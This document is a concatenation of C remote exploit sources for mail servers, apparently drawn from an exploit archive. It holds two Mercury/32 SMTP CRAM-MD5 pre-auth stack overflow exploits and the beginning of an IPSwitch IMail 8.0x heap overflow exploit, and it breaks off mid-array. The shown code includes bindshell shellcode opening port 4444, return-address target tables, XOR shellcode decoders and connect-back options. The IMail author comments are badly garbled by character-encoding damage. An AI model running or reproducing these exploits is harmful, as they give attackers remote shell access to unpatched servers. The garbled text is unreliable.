void exploit_mercury_smtpd(char* ip, unsigned short port)
{
SOCKET s;
WSADATA wsa;
char buf[1500];
char payload[sizeof(buf)*4/3+16];
int base64_len;
memset(buf, 0x90, sizeof(buf));
memcpy(&buf[1244-sizeof(shellcode)-32], shellcode, sizeof(shellcode));
memcpy(&buf[1244], "\x90\x90\xeb\x06", 4);
memcpy(&buf[1244+4], "\x2d\x12\x40\x00", 4); //universal opcode in mercury.exe. no safeseh
memcpy(&buf[1244+4+4], "\x90\x90\x90\x90\xE9\x44\xfd\xff\xff", 9);
buf[sizeof(buf)-1] = '\0';
memset(payload, 0x00, sizeof(payload));
base64_len = Base64Encode(payload, buf, sizeof(buf));
memcpy(&payload[base64_len], "\r\n", 3);
printf(" connect to %s:%d ... ", ip, port);
WSAStartup(MAKEWORD(2,2), &wsa);
s = MakeConnection(ip, port, 10);
if(s <= 0)
{
printf("Failed! %s\n", GetErrorMessage(GetLastError()) );
return;
}
else
{
printf("OK!\n");
}
_snprintf(buf, sizeof(buf), "EHLO void#ph4nt0m.org\r\n");
printf("[C] %s", buf);
check_send(s, buf, strlen(buf));
check_recv(s, "250 HELP");
_snprintf(buf, sizeof(buf), "AUTH CRAM-MD5\r\n");
printf("[C] %s", buf);
check_send(s, buf, strlen(buf));
check_recv(s, "334");
printf("[C] Send Payload...\n");
check_send(s, payload, strlen(payload));
printf("[-] Done! cmdshell@1154?\n");
closesocket(s);
WSACleanup();
}
void main(int argc, char* argv[])
{
printf("== Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow\n");
printf("== Public Version 1.0\n");
printf("== http://www.ph4nt0m.org 2007-08-22\n");
printf("== code by Zhenhan.Liu\n\n");
if(argc==3)
exploit_mercury_smtpd(argv[1], atoi(argv[2]));
else
{
printf( "Usage:\n"
" %s <ip> <port> \n", argv[0]);
}
}
// [2007-08-22]
25 Mercury/32 v3.32-v4.51 SMTP Pre-Auth EIP Overwrite Exploit
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : Mercury/32 SMTP Server
* Found by : [email protected], http://www.offensive-security.com
* ----------------------------------------
* Exploit : Mercury/32 v3.32-v4.51 SMTP Pre-Auth EIP overwrite exploit
* Exploit date : 26.08.2007
* Exploit writer : Heretic2 ([email protected])
* OS : Windows ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Info : The EIP overwrite exploitation is easy here and works on previous versions of the
* Mercury/32, like 4.01a, 4.01b and may be earlier.
* ----------------------------------------
* Thanks to:
* 1. eliteb0y ( )
* 2. The Metasploit project ( http://metasploit.com )
* 3. http://www.ph4nt0m.org ( )
* 4. Dreatica-FXP crew ( )
* ----------------------------------------
* This was written for educational purpose only. Use it at your own risk. Author will be not be
* responsible for any damage, caused by that code.
************************************************** **********************************
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib,"ws2_32")
#include <ctype.h>
void usage(char * s);
void logo();
void end_logo();
void prepare_shellcode(unsigned char * fsh, int sh);
void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh);
int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port);
SOCKET do_connect (char *remotehost, int port);
void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, char * ret) ;
void base64_decode(char const * encoded_string, char * ret) ;
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring);
char *optarg; // global argument pointer
int optind = 0, opterr; // global argv index
// -----------------------------------------------------------------
// -----------------------------------------------------------------
struct {
const char *t ;
unsigned long ret ;
} targets[]=
{
{"UNIVERSAL: Mercury/32 SMTP v4.51 [TER32.dll ]", 0x258d0d1e },// jmp esp
{"Windows XP SP0 RUSSIAN [shell32.dll]", 0x77b49bbb },// jmp esp
{"Windows XP SP1 RUSSIAN [user32.dll ]", 0x77db532f },// jmp esp
{"Windows XP SP2 RUSSIAN [shell32.dll]", 0x7d168fe7 },// jmp esp
{"Windows 2003 SP0 STANDART [shell32.dll]", 0x77b0f967 },// jmp esp
{"Debug", 0x42424242 },//
{NULL, 0x00000000 }
};
struct {
const char * name;
int length;
char * shellcode;
}shellcodes[]={
{"Bindshell, port 4444 [ args: none ]", 344,
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=Pex http://metasploit.com */
"\x2b\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x 81\x76\x0e\x02"
"\x6b\x82\x87\x83\xee\xfc\xe2\xf4\xfe\x01\x69\xca\x ea\x92\x7d\x78"
"\xfd\x0b\x09\xeb\x26\x4f\x09\xc2\x3e\xe0\xfe\x82\x 7a\x6a\x6d\x0c"
"\x4d\x73\x09\xd8\x22\x6a\x69\xce\x89\x5f\x09\x86\x ec\x5a\x42\x1e"
"\xae\xef\x42\xf3\x05\xaa\x48\x8a\x03\xa9\x69\x73\x 39\x3f\xa6\xaf"
"\x77\x8e\x09\xd8\x26\x6a\x69\xe1\x89\x67\xc9\x0c\x 5d\x77\x83\x6c"
"\x01\x47\x09\x0e\x6e\x4f\x9e\xe6\xc1\x5a\x59\xe3\x 89\x28\xb2\x0c"
"\x42\x67\x09\xf7\x1e\xc6\x09\xc7\x0a\x35\xea\x09\x 4c\x65\x6e\xd7"
"\xfd\xbd\xe4\xd4\x64\x03\xb1\xb5\x6a\x1c\xf1\xb5\x 5d\x3f\x7d\x57"
"\x6a\xa0\x6f\x7b\x39\x3b\x7d\x51\x5d\xe2\x67\xe1\x 83\x86\x8a\x85"
"\x57\x01\x80\x78\xd2\x03\x5b\x8e\xf7\xc6\xd5\x78\x d4\x38\xd1\xd4"
"\x51\x38\xc1\xd4\x41\x38\x7d\x57\x64\x03\x93\xdb\x 64\x38\x0b\x66"
"\x97\x03\x26\x9d\x72\xac\xd5\x78\xd4\x01\x92\xd6\x 57\x94\x52\xef"
"\xa6\xc6\xac\x6e\x55\x94\x54\xd4\x57\x94\x52\xef\x e7\x22\x04\xce"
"\x55\x94\x54\xd7\x56\x3f\xd7\x78\xd2\xf8\xea\x60\x 7b\xad\xfb\xd0"
"\xfd\xbd\xd7\x78\xd2\x0d\xe8\xe3\x64\x03\xe1\xea\x 8b\x8e\xe8\xd7"
"\x5b\x42\x4e\x0e\xe5\x01\xc6\x0e\xe0\x5a\x42\x74\x a8\x95\xc0\xaa"
"\xfc\x29\xae\x14\x8f\x11\xba\x2c\xa9\xc0\xea\xf5\x fc\xd8\x94\x78"
"\x77\x2f\x7d\x51\x59\x3c\xd0\xd6\x53\x3a\xe8\x86\x 53\x3a\xd7\xd6"
"\xfd\xbb\xea\x2a\xdb\x6e\x4c\xd4\xfd\xbd\xe8\x78\x fd\x5c\x7d\x57"
"\x89\x3c\x7e\x04\xc6\x0f\x7d\x51\x50\x94\x52\xef\x f2\xe1\x86\xd8"
"\x51\x94\x54\x78\xd2\x6b\x82\x87"
},
{NULL , NULL }
};
// -----------------------------------------------------------------
// BASE64
// -----------------------------------------------------------------
char base64_chars[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789+/";
static inline bool is_base64(unsigned char c) {
return (isalnum(c) || (c == '+') || (c == '/'));
}
void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, char * ret)
{
int i = 0;
int j = 0;
unsigned char char_array_3[3];
unsigned char char_array_4[4];
while (in_len--)
{
char_array_3[i++] = *(bytes_to_encode++);
if (i == 3) {
char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
char_array_4[3] = char_array_3[2] & 0x3f;
for(i = 0; (i <4) ; i++)
ret[strlen(ret)]=base64_chars[char_array_4[i]];
//ret += base64_chars[char_array_4[i]];
i = 0;
}
}
if (i)
{
for(j = i; j < 3; j++)
char_array_3[j] = '\0';
char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
char_array_4[3] = char_array_3[2] & 0x3f;
for (j = 0; (j < i + 1); j++)
ret[strlen(ret)]=base64_chars[char_array_4[j]];
//ret += base64_chars[char_array_4[j]];
while((i++ < 3))
ret[strlen(ret)]='=';
//ret += '=';
}
}
void base64_decode(char const * encoded_string, char * ret)
{
int in_len = strlen(encoded_string);//encoded_string.size();
int i = 0;
int j = 0;
int in_ = 0;
unsigned char char_array_4[4], char_array_3[3];
while (in_len-- && ( encoded_string[in_] != '=') && is_base64(encoded_string[in_]))
{
char_array_4[i++] = encoded_string[in_]; in_++;
if (i ==4) {
for (i = 0; i <4; i++)
char_array_4[i] = strchr(base64_chars, char_array_4[i])-base64_chars;//base64_chars.find(char_array_4[i]);
char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4);
char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2);
char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3];
for (i = 0; (i < 3); i++)
ret[strlen(ret)]=char_array_3[i];
//ret += char_array_3[i];
i = 0;
}
}
if (i) {
for (j = i; j <4; j++)
char_array_4[j] = 0;
for (j = 0; j <4; j++)
char_array_4[j] = strchr(base64_chars, char_array_4[j])-base64_chars;//base64_chars.find(char_array_4[j]);
char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4);
char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2);
char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3];
for (j = 0; (j < i - 1); j++) ret[strlen(ret)]=char_array_3[j];//ret += char_array_3[j];
}
}
// -----------------------------------------------------------------
// -----------------------------------------------------------------
// -----------------------------------------------------------------
int main(int argc, char **argv)
{
char * remotehost=NULL;
char default_remotehost[]="127.0.0.1";
char temp1[100], temp2[100];
int port, itarget, sh;
SOCKET s;
char c;
logo();
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
if(argc<2)
{
usage(argv[0]);
return -1;
}
// set defaults
port=25;
itarget=0;
sh=0;
// ------------
while((c = getopt(argc, argv, "h:p:s:t:"))!= EOF)
{
switch (c)
{
case 'h':
remotehost=optarg;
break;
case 's':
sscanf(optarg, "%d", &sh);
sh--;
break;
case 't':
sscanf(optarg, "%d", &itarget);
itarget--;
break;
case 'p':
sscanf(optarg, "%d", &port);
break;
default:
usage(argv[0]);
WSACleanup();
return -1;
}
}
if(remotehost == NULL) remotehost=default_remotehost;
memset(temp1,0,sizeof(temp1));
memset(temp2,0,sizeof(temp2));
memset(temp1, '\x20' , 58 - strlen(remotehost) -1);
printf(" # Host : %s%s# \n", remotehost, temp1);
sprintf(temp2, "%d", port);
memset(temp1,0,sizeof(temp1));
memset(temp1, '\x20' , 58 - strlen(temp2) -1);
printf(" # Port : %s%s# \n", temp2, temp1);
memset(temp1,0,sizeof(temp1));
memset(temp2,0,sizeof(temp2));
sprintf(temp2, "%s", shellcodes[sh].name );
memset(temp1, '\x20' , 58 - strlen(temp2) -1);
printf(" # Payload : %s%s# \n", temp2, temp1);
if(itarget>=0)
{
memset(temp1,0,sizeof(temp1));
memset(temp1, '\x20' , 57 - strlen(targets[itarget].t) -1);
printf(" # Target : %s%s# \n", targets[itarget].t, temp1);
}else
{
printf(" # ------------------------------------------------------------------- # \n");
printf("[-] Target is invalid\n");
end_logo();
return -1;
}
printf(" # ------------------------------------------------------------------- # \n");
fflush(stdout);
printf("[+] Checking if server is online\n");
fflush(stdout);
s=do_connect(remotehost, port);
if(s==-1)
{
printf("[-] Server is OFFLINE\n");
end_logo();
return 0;
}
closesocket(s);
printf("[+] Server is ONLINE\n");
unsigned char buf[50000];
unsigned int len;
memset(buf,0,sizeof(buf));
fflush(stdout);
make_buffer(buf, &len, itarget, sh);
printf("[+] Attacking buffers constructed\n");
if(send_buffer(buf, len, remotehost,port)==-1)
{
printf("[-] Cannot exploit server %s\n", remotehost);
end_logo();
WSACleanup();
return -1;
}
printf("[+] Buffer sent");
printf("[+] Now try connect to %s:%d\n", remotehost, 4444);
end_logo();
return 0;
}
SOCKET do_connect (char *remotehost, int port)
{
static struct hostent *host;
static struct sockaddr_in addr;
SOCKET s;
host = gethostbyname(remotehost);
if (!host)
{
perror("[-] gethostbyname() failed");
return -1;
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
s = socket(PF_INET, SOCK_STREAM, 0);
if (s == -1)
{
closesocket(s);
perror("socket() failed");
return -1;
}
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
{
closesocket(s);
return -1;
}
return s;
}
void prepare_shellcode( char * fsh, unsigned int * fshlen, int sh)
{
memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length);
*fshlen = shellcodes[sh].length;
}
void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh)
{
// prepare shellcode
char fsh[10000];
unsigned int fshlen;
memset(fsh, 0, sizeof(fsh));
prepare_shellcode(fsh, &fshlen, sh);
// -----------------
// make buffer with shellcode inside
unsigned char * cp=buf;
// init
memset(cp, '\x41', 1300);
cp+=204;
// replace EIP
*cp++ = (char)((targets[itarget].ret ) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 8) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 16) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 24) & 0xff);
// jff
*cp++ = '\x90';
*cp++ = '\x90';
*cp++ = '\x90';
*cp++ = '\x90';
// copy the shellcode
memcpy(cp, fsh, fshlen);
cp+=fshlen;
*len = (unsigned int)(cp-buf);
// -----------------
}
int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port)
{
char bufmax[4096], sendbuf[5000];
SOCKET s;
s = do_connect(remotehost, port);
memset(bufmax, 0 , sizeof(bufmax));
recv(s, bufmax, sizeof(bufmax),0);
bufmax[sizeof(bufmax)-1] = 0;
printf("[+] Server: %s\n", bufmax);
// send EHLO
memset(sendbuf, 0, sizeof(sendbuf));
strcat(sendbuf, "EHLO Dreatica-FXP\r\n");
printf("[+] Request: EHLO Dreatica-FXP\n");
send(s, sendbuf, (int)strlen(sendbuf),0);
// send AUTH CRAM-MD5
memset(sendbuf, 0, sizeof(sendbuf));
strcat(sendbuf, "AUTH CRAM-MD5\r\n");
printf("[+] Request: AUTH CRAM-MD5\n");
send(s, sendbuf, (int)strlen(sendbuf),0);
// i don't make the correct recv procedure like Zhenhan.Liu have done in his code
// just put 3 recv for that
memset(bufmax, 0 , sizeof(bufmax));
recv(s, bufmax, sizeof(bufmax),0);
bufmax[sizeof(bufmax)-1] = 0;
printf("[+] Reply: %s\n",bufmax);
memset(bufmax, 0 , sizeof(bufmax));
recv(s, bufmax, sizeof(bufmax),0);
bufmax[sizeof(bufmax)-1] = 0;
printf("[+] Reply: %s\n",bufmax);
memset(bufmax, 0 , sizeof(bufmax));
recv(s, bufmax, sizeof(bufmax),0);
bufmax[sizeof(bufmax)-1] = 0;
printf("[+] Reply: %s\n",bufmax);
// ALL is OKE
printf("[+] Sending payload...\n");
memset(sendbuf, 0, sizeof(sendbuf));
base64_encode(buf, len, sendbuf);
sendbuf[strlen(sendbuf)]= '\r';
sendbuf[strlen(sendbuf)]= '\n';
send(s, sendbuf, (int)strlen(sendbuf), 0);
closesocket(s);
return 1;
}
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring)
{
static char *next = NULL;
if (optind == 0)
next = NULL;
optarg = NULL;
if (next == NULL || *next == '\0')
{
if (optind == 0)
optind++;
if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
{
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}
if (strcmp(argv[optind], "--") == 0)
{
optind++;
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}
next = argv[optind];
next++; // skip past -
optind++;
}
char c = *next++;
char *cp = strchr(optstring, c);
if (cp == NULL || c == ':')
return '?';
cp++;
if (*cp == ':')
{
if (*next != '\0')
{
optarg = next;
next = NULL;
}
else if (optind < argc)
{
optarg = argv[optind];
optind++;
}
else
{
return '?';
}
}
return c;
}
// -----------------------------------------------------------------
// -----------------------------------------------------------------
// -----------------------------------------------------------------
void usage(char * s)
{
printf("\n");
printf(" Usage: %s -p <port> -h <host> -s <shellcode> -t <target>\n\n", s);
printf(" Arguments:\n");
printf(" -p <port> Port of the Mercury SMTP (default: 25)\n");
printf(" -h <host> Hostname of the server\n");
printf(" -s <shellcode> Payload to use (default: 1)\n");
printf(" -t <target> Target to attack (default: 1)\n");
printf("\n");
printf(" Shellcodes:\n");
for(int i=0; shellcodes[i].name!=0;i++)
{
printf(" %d. %s\n",i+1,shellcodes[i].name);
}
printf("\n");
printf(" Targets:\n");
for(int j=0; targets[j].t!=0;j++)
{
printf(" %d. %s\n",j+1,targets[j].t);
}
printf("\n");
end_logo();
}
void logo()
{
printf("\n\n");
printf(" ################################################## ##################### \n");
printf(" # ____ __ _ ______ __ _____ #\n");
printf(" # / __ \\________ _____/ /_(_)_________ / __/\\ \\/ / / _ / #\n");
printf(" # / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___ / / \\ / / // / #\n");
printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \\ / ___/ #\n");
printf(" # /_____/_/ \\___/ \\_,_/\\__/_/\\___/\\__,_/ /_/ /_/\\_\\/_/ #\n");
printf(" # crew #\n");
printf(" ################################################## ##################### \n");
printf(" # Exploit : Mercury/32 v3.32-v4.51 SMTP EIP overwrite exploit # \n");
printf(" # Tested : Mercury/32 SMTP v3.32, v4.01a, v4.51 # \n");
printf(" # Author : Heretic2 (http://www.dreatica.cl/) # \n");
printf(" # Research: eliteb0y # \n");
printf(" # Version : 1.0 # \n");
printf(" # System : Windows ALL # \n");
printf(" # Date : 26.08.2007 # \n");
printf(" # ------------------------------------------------------------------- # \n");
}
void end_logo()
{
printf(" # ------------------------------------------------------------------- # \n");
printf(" # Dreatica-FXP crew [Heretic2] # \n");
printf(" ################################################## ##################### \n\n");
}
// [2007-08-26]
25 IPSwitch IMail Server 8.0x Remote Heap Overflow Exploit
/*
by axis
2007-06-05
http://www.ph4nt0m.org
Mail-List: http://list.ph4nt0m.org
ÒÔÇ°ÓÃ� �ÕâžöÒ� �»Å¾Ã¶imailµÄexp
PRIVATE Remote Exploit For IMAIL Smtp Server(1.2)
This is For imail 8.01-8.11 version
Usage:faint.exe -d <host> [options]
Options:
-d: Hostname to attack [Required]
-t: Type [Default: 0]
-p: Attack port [Default: 25]
-S: the IP connect back to.
-P: the port connect back to.
Types:
0: win2k All version , IMail 8.01-11
²»ÖªµÃ� �€ÃƒÂŠÃƒÂ‡ÃƒÂ„ÄÎÃ� ��»Å½Ã³Ã…£ÃÂ� �…½ÂµÃ„
×îœü¿Å� �½ÃƒÂË¿Ž£Ã� ��¬
·Ç³£ºÃ� �ƒÃƒÂæµÄÒÃ� �»Å¾Ã¶Ã‚©¶� �…½Â¡Â£
©¶ŽÊà‡Ã‚·Â¢Ã‰ÃºÃ”Ã� �šiaspam.dllÀï
loc_1001ada5 ==> ×¢Òâ¶Â� �¯ÃƒÂŒÃ‚¬ÂµÃ·ÃŠÃ� �”ʱºò×Ã� ��¢Ã’âŒÓÃÂ� �Ø»ùÖ·Â� �µÃƒÂ„²»Ã¬Ã� ��¡Â£
mov eax, [ebp+var_54]
mov ecx, [eax+10c8h]
push ecx ; char *
mov edx, [ebp+var_54]
mov eax, [edx+10d0h]
push eax ; char *
call _strcpy
add esp, 8
jmp loc_1001a6f0
͉˕strcpyµ� �ƒÂ„ÃÂœžöbuffer� �‚£Â¬srcºÃÂdstµ� �ƒÂ„ÖžÕ렣¬ŸÓȻà ŠÃ‡Ã–±œÓ ŽÓ¶ÑÀÃ� �¯Ã‚¶Ã³öÀÃ� �½ÂµÃ„¡£
¶øÖ®ÇÂ� �°ÃƒÂƒÃ‚»Ã“ÃÂ×à ¶ÃˆÃŽÂºÃŽÅ’Ã� �¬Â²Ã©
ËùÒÔ·Â� �¢ÃƒÂ‹ÃƒÂžöÓà ŠÅ’þµœ· þÎñÆ÷£ ¬SMDÎÄŒþ
È»ºóÔÃÂ� �Æäºóµà„Æ«ÒÆŽà … Â¿Ã˜Ã–ÆÕà¢ÃƒÂœžöµÃ ˜Ã–·£¬Ÿ� �ƒÂ¿ÉÒÔ ¿Ã…“±ŽÈÎà ’â×Ö·ûà …½Â®ÂµÅ“ÈÃÂ� �ÒâÄÚŽà¦Ã‚¡Â£
badcharÊÇ 0x00 0x0a emm˵»¹Óà ƒÂžö 0x25,²»¹ýÎà ƒÂ’ûÕÒÂÂ� �œ¡£
ÒÔÇ°ÃÂà¸ÃƒÂ‰ÃƒÂÄǞà ¶Â·Å½ÃÂµà ƒÂ„°æ±ŸÂÂ� �¬ÊÇÀûà“ÃÃÂËž²Ã� �¾Ã‡pebÀïµÃÂ� ��ÖžÕë¡Ã� �£
ÕâÖÖ·Å� �“·šÔÚ2003ÃÂ� ��ò»ÄÜÃ� �“á£
ÕâÀïÎÃÂ� �²ÉÓÃÃÂà‹emmµÄ·œ ·Ã…¡Â£Â¬Â¹Â¹Ã� �”ìÃÂËÒ»� �…¾Ã¶Ã’ç³ö
ÒòΪimailsec.dllÃ� �µÃ„.data¶Î¿Ã� �‰ÃƒÂŽ¡£
ËùÒÔÎÃÂ� ��ÕÒµœÃÂÃ� �‹Ã•Ã¢ÃƒÅ½Ã’� �‚»Å¾Ã¶ÂµÃ˜ÂÂ� �œ
1000CB5D 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
1000CB60 50 PUSH EAX
1000CB61 8B0D 6C540310 MOV ECX,DWORD PTR DS:[1003546C] ; IMailsec.1003549C
1000CB67 51 PUSH ECX
1000CB68 8D95 FCFDFFFF LEA EDX,DWORD PTR SS:[EBP-204]
1000CB6E 52 PUSH EDX
1000CB6F FF15 F8D30210 CALL DWORD PTR DS:[<&USER32.wsprintfA>] ; USER32.wsprintfA
ÆäÖÃÂÖŠ¾ÃƒÂ•ÃƒÂ«DWORD PTR DS:[1003546C] ÔÚimailsec.dllµÄ.da taÖã¬Õà ¢Å¾Ã¶ÂµÃ˜Ã–Ã� ��·Â¿Ã‰Ã’ÔÂÂ� �»ÎÒÃÇÅ� �¾Ã‚²Å¾Ã‡Â¡Â£
ËùÒÔÎÃÂ� ��ÃǟÿÃ� �‰ÃƒÂ’Ô¹¹Ô� �ƒÂ¬ÃƒÂ’»žöÃÂ� �ç³ö¡£
ˌ·ÈÃ� �§ÃƒÂ壼
µÚÒ»·à¢ÃƒÂ“ÊŒþ£Ã� �º ·¢ËÃÂshellcodeÂ� �µÃ…“ÄÚŽæÃ� �–ñ£Žæ� �‚ºÃƒÂ¡Â£Ã•ÃÂ� �ÀïÎÒ·à…µœÃÂËtebÃÂ� �ÃÂ
µÚ¶þ·ÃÂ� �ÓÊŒþ£Â º ·¢ËÃÂÒà§Ã‚³Ã¶ÃÂèÒÂ� �ªÃ‚µÃ„ž²žà ƒÂ‡ÃƒÂ—Ö·ûÅÂ� �®µœÄÚÃ� �½Ã¦Ã–ñ£à …½Ã¦ÂºÃƒÂ¡Â£ ÕâÀïÎÃÂ� �Ò²·ÅÔà šÃÂËtebÖÃÂ
µÚÈý·â ÓÊŒþ£Â� �º ž²žÇimailsec.dllà ƒÂ–Ã嵀 .data¶ÎµÄÖ� �…¾Ã•Ã«Â£Â¬ÃÂ� �¹wsprintfAÔì³Ã� �‰ÃƒÂ’ç³ö
Òç³öž ²Ã…¾Ã‡ÃŠÂ¹Ã“à ƒÂµÃ„×Ö·� �ƒÂ»Ã…½Â®ÃŠÃ‡ÂÂ� �Ú¶þ·âÃÂ� ��ÊŒþ·¢Ã ‹Ã¹ýÈ¥Ã� ��µÃ„£¬žÂÂ� �žÇºóµÃ� �„·µ»Øµà ƒÂ˜ÃƒÂ–·Ö±ÅÂ� ��ÓÖžÃÂòÃ� �˵ÚÒ»Ã� ��·Ã¢Ã“ÊŒþ� �‚·Â¢Ã‹Ã¹ÃÂ� �È¥µÄshellcodeÃ� �”ÚÄÚŽæà –ÃµĵØà ƒÂ–·¡£
ËùÒÔÕà¢Ã…¾Ã¶Ã‚©¶Ã� �½ÃŠÃ‡ÂºÃÂÆà …“ÌšÎÞ¹ صģ¡Â� �£Ã‚¡Â²Â»ÃÂèà ’ªÈκÎopc ode£¡£¡
ÔÚʵŒàŠÃƒÂ€ÃƒÂ»ÃƒÂ“ÃÊÂ� �±ÃƒÂŽÃƒÂ’·¢ËÃ� �ÂÃÂË4·âÓ� �ƒÂŠÃ…’þ£¬ µÃƒÂšÃƒÂ’»·âÃ� �ŠÃƒÂ‡Ã‚·ÃÂÓÊÃ� �’þ£¬ÓÃ� �ƒÂ“ÚÌážß� �‚³Ã‰Â¹Å Ã‚Ê¡£
ÓÉÓÚ»Â� �¥ÃƒÂªÃÂøµÃ� �„spam·ºÀÄÂ� �£Ã‚¬Ã‹Ã¹Ã’ÔÃ� ��µÃˆÂµÅ“ÓÊ Œþ·þÎÃÂ� �Æ÷ŽŠÀÃÂ*©¶Š½ÃƒÂ“ÊŒþÊ ±Â£Â¬Ã’²ÃÂà ƒÂ*ÒÑŸÂÂ*¹� �ƒÂ½ÃƒÂËŒžŠ¾ÃƒÂ¶ÃƒÂ”ÂÃÂË ¡Â£Â¡Â£Â¡Â£
ËùÒÔ×à®Ã‚ºÃƒÂµÃ„·Ã� �“°žÊÇÊ� �‚¹Ã“Ãdownload+exec µÄshellcode¡£
ÕâÀïžÃÂ� �³öÒ»žÃ� �¶Ã‚±ÃˆÅ“ÃÂÀÃ� �ƒÂµÃ„·ŽÃÂ� �‚¬shellcode×÷ÎÂÂ� �poc¡£
ŸÃÂemm˵ÕÃ� �¢Å¾Ã¶Ã‚©¶� �…½Ã’»Ö±àƒÃ‚»Â²Â¹Â£Â¬Ã� �–»ÊÇžß� �‚°Ã¦Â±Å¸ÃƒÂÂ� �ÓÃÂÃÂË¡Â� �£Ã‚¡Â£Â¡Â£
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winsock.h>
#include <io.h>
#pragma comment (lib,"ws2_32")
char *szEHLO = "HELO\r\n";
char *szMF = "MAIL FROM <****er@****imail.org>\r\n";
char *szRCPT = "RCPT TO: <postmaster>\r\n";
char *szDATA = "DATA\r\n";
char *szTIME = "Date: Thu, 1 Oct 2007 07:06:09 +0800\r\n";
char *szMIME = "MIME\r\n";
char *szEND = ".\r\n";
char *szQUIT = "QUIT\r\n";
char *szCT = "Content-Type: multipart/boundary=";
char *szCTE = "Content-Transfer-Encoding:";
//#define SCaddr "\x50\xe7\x03\x10"
#define SCaddr "\x50\xc8\xfd\x7f"
#define ****_ptr "\x6c\x54\x03\x10" //0x1003546c
#define Teb_temp1 0x7ffdd050
#define Teb_temp2 0x7ffdd040
#define Teb_temp3 0x7ffdd030
unsigned short port = 25;
unsigned char payload[5000] = "";
#define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90\
__asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90
#define PROC_END PROC_BEGIN
unsigned char sh_Buff[2048];
unsigned int sh_Len;
unsigned int Enc_key=0x99; //ÆäʵÎÞ ¹ØœôÒÂ� �ª,¶¯Ì¬Ñà ‚°Ã•Ã’
unsigned char decode1[] =
/*
00401004 . /EB 0E JMP SHORT encode.00401014
00401006 $ |5B POP EBX
00401007 . |4B DEC EBX
00401008 . |33C9 XOR ECX,ECX
0040100A . |B1 FF MOV CL,0FF
0040100C > |80340B 99 XOR BYTE PTR DS:[EBX+ECX],99
00401010 .^|E2 FA LOOPD SHORT encode.0040100C
00401012 . |EB 05 JMP SHORT encode.00401019
00401014 > \E8 EDFFFFFF CALL encode.00401006
*/
"\xEB\x0E\x5B\x4B\x33\xC9\xB1"
"\xFF" // shellcode size
"\x80\x34\x0B"
"\xB8" // xor byte
"\xE2\xFA\xEB\x05\xE8\xED\xFF\xFF\xFF";
unsigned char decode2[] =
/*
00406030 /EB 10 JMP SHORT 00406042
00406032 |5B POP EBX
00406033 |4B DEC EBX
00406034 |33C9 XOR ECX,ECX
00406036 |66:B9 6601 MOV CX,166
0040603A |80340B 99 XOR BYTE PTR DS:[EBX+ECX],99
0040603E ^|E2 FA LOOPD SHORT 0040603A
00406040 |EB 05 JMP SHORT 00406047
00406042 \E8 EBFFFFFF CALL 00406032
*/
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9"
"\x66\x01" // shellcode size
"\x80\x34\x0B"
"\xB8" // xor byte
"\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF";
// kernel32.dll functions index
#define _LoadLibraryA 0x00
#define _CreateProcessA 0x04
//#define _ExitProcess 0x08
#define _ExitThread 0x08
#define _WaitForSingleObject 0x0C
// ws2_32.dll functions index
#define _WSASocketA 0x10
#define _connect 0x14
#define _closesocket 0x18
//#define _WSAStartup 0x1C
// functions number
#define _Knums 4
#define _Wnums 3
// Need functions
unsigned char functions[100][128] =
{ // [esi] stack layout
// kernel32 4 // 00 kernel32.dll
{"LoadLibraryA"}, // [esi]
{"CreateProcessA"}, // [esi+4]
{"ExitThread"}, // [esi+8]
